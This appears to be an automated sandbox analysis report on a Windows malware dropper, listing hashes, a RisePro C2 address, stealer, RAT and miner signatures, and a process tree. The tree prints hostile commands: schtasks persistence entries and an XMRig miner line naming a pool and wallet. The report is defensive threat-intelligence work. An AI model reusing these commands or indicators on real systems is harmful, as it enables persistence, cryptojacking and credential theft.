Resubmissions
16-02-2024 02:54
240216-dd14ysfc71 1016-02-2024 01:10
240216-bjwqbaea93 1009-02-2024 16:00
240209-tfl1taed86 1009-02-2024 13:49
240209-q4sxgsbf9v 1006-02-2024 16:58
240206-vg3kmadccn 1006-02-2024 00:32
240206-avq4jadbfj 10Analysis
-
max time kernel
278s -
max time network
338s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
-
submitted
16-02-2024 02:54
General
-
Target
4363463463464363463463463.bin.exe
-
Size
10KB
-
MD5
2a94f3960c58c6e70826495f76d00b85
-
SHA1
e2a1a5641295f5ebf01a37ac1c170ac0814bb71a
-
SHA256
2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce
-
SHA512
fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f
-
SSDEEP
192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K
Malware Config
Extracted
risepro
193.233.132.62:50500
Signatures
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Detect Fabookie payload 2 IoCs
-
Detect ZGRat V1 44 IoCs
-
Fabookie
Fabookie is facebook account info stealer.
-
Process spawned unexpected child process 36 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
RisePro
RisePro stealer is an infostealer distributed by PrivateLoader.
-
UAC bypass 3 TTPs 1 IoCs
-
ZGRat
ZGRat is remote access trojan written in C#.
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
DCRat payload 3 IoCs
Detects payload of DCRat, commonly dropped by NSIS installers.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
-
XMRig Miner payload 2 IoCs
-
Blocklisted process makes network request 5 IoCs
-
Disables Task Manager via registry modification
-
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 14 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 33 IoCs
-
Identifies Wine through registry keys 2 TTPs 1 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
-
Loads dropped DLL 4 IoCs
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
UPX packed file 2 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Uses the VBS compiler for execution 1 TTPs
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
-
Adds Run key to start application 2 TTPs 2 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 2 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 8 IoCs
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
-
Drops file in System32 directory 4 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
-
Suspicious use of SetThreadContext 7 IoCs
-
Drops file in Program Files directory 7 IoCs
-
Drops file in Windows directory 10 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
-
Checks processor information in registry 2 TTPs 17 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 40 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 1 IoCs
-
Enumerates system info in registry 2 TTPs 17 IoCs
-
Modifies registry class 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 64 IoCs
-
Suspicious use of SendNotifyMessage 64 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
System policy modification 1 TTPs 1 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 1 IoCs
-
outlook_office_path 1 IoCs
-
outlook_win_path 1 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.bin.exe"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.bin.exe"1⤵
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Files\rty47.exe"C:\Users\Admin\AppData\Local\Temp\Files\rty47.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Files\bugai.exe"C:\Users\Admin\AppData\Local\Temp\Files\bugai.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Adds Run key to start application
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- outlook_office_path
- outlook_win_path
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\heidi1lYaOz_hhmA8\8Grb8KDhLIvSHwFX11Lr.exe"C:\Users\Admin\AppData\Local\Temp\heidi1lYaOz_hhmA8\8Grb8KDhLIvSHwFX11Lr.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/4⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffed63846f8,0x7ffed6384708,0x7ffed63847185⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2124,5597203421561906269,6992843833515507126,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2192 /prefetch:35⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,5597203421561906269,6992843833515507126,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2100 /prefetch:25⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.linkedin.com/login4⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffed63846f8,0x7ffed6384708,0x7ffed63847185⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2028,16576133022588054333,6748342368802147436,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2096 /prefetch:35⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2028,16576133022588054333,6748342368802147436,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2040 /prefetch:25⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/video4⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffed63846f8,0x7ffed6384708,0x7ffed63847185⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2156,1570712799063802657,10623681284306276479,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2232 /prefetch:35⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2156,1570712799063802657,10623681284306276479,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2864 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,1570712799063802657,10623681284306276479,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,1570712799063802657,10623681284306276479,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3280 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2156,1570712799063802657,10623681284306276479,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2172 /prefetch:25⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/4⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffed63846f8,0x7ffed6384708,0x7ffed63847185⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1436,17294382015584421993,1794699919527336225,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 /prefetch:35⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://www.facebook.com/video4⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffed63846f8,0x7ffed6384708,0x7ffed63847185⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://www.youtube.com4⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffed63846f8,0x7ffed6384708,0x7ffed63847185⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2164,6535321715299811068,16110170856613559928,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2220 /prefetch:35⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2164,6535321715299811068,16110170856613559928,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2168 /prefetch:25⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2164,6535321715299811068,16110170856613559928,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2476 /prefetch:25⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://accounts.google.com4⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffed63846f8,0x7ffed6384708,0x7ffed63847185⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com4⤵
- Enumerates system info in registry
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffed6229758,0x7ffed6229768,0x7ffed62297785⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.facebook.com/video4⤵
- Enumerates system info in registry
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffed6229758,0x7ffed6229768,0x7ffed62297785⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" https://accounts.google.com4⤵
- Enumerates system info in registry
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x108,0x10c,0x110,0xe4,0x114,0x7ffed6229758,0x7ffed6229768,0x7ffed62297785⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com5⤵
- Checks processor information in registry
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5320.0.1755213877\1603258636" -parentBuildID 20221007134813 -prefsHandle 1868 -prefMapHandle 1852 -prefsLen 20749 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {62500a25-2739-4050-befa-eb8002bb9790} 5320 "\\.\pipe\gecko-crash-server-pipe.5320" 1960 26cb06d2458 gpu6⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.facebook.com/video4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.facebook.com/video5⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" https://accounts.google.com4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" https://accounts.google.com5⤵
-
C:\Users\Admin\AppData\Local\Temp\heidi1lYaOz_hhmA8\CuxOU1F9RSuscwzIIgFo.exe"C:\Users\Admin\AppData\Local\Temp\heidi1lYaOz_hhmA8\CuxOU1F9RSuscwzIIgFo.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\Files\ma.exe"C:\Users\Admin\AppData\Local\Temp\Files\ma.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpBD83.tmp.bat""3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\timeout.exetimeout 34⤵
- Delays execution with timeout.exe
-
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"6⤵
- Creates scheduled task(s)
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o fr-zephyr.miningocean.org:5342 -u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z -p work -a rx/0 --donate-level 1 --opencl5⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\Files\dvchost.exe"C:\Users\Admin\AppData\Local\Temp\Files\dvchost.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_3.zip -oextracted4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_2.zip -oextracted4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_1.zip -oextracted4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\attrib.exeattrib +H "winhostDhcp.exe"4⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\main\winhostDhcp.exe"winhostDhcp.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\dzhJcmA8P8.bat"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\chcp.comchcp 650016⤵
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:26⤵
-
C:\odt\conhost.exe"C:\odt\conhost.exe"6⤵
- Executes dropped EXE
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\Files\native.exe"C:\Users\Admin\AppData\Local\Temp\Files\native.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\BBLb.exe"C:\Users\Admin\AppData\Local\Temp\BBLb.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\BBLb.exeC:\Users\Admin\AppData\Local\Temp\BBLb.exe4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\BBLb.exeC:\Users\Admin\AppData\Local\Temp\BBLb.exe4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\BBLb.exeC:\Users\Admin\AppData\Local\Temp\BBLb.exe4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\BBLb.exeC:\Users\Admin\AppData\Local\Temp\BBLb.exe4⤵
- Executes dropped EXE
-
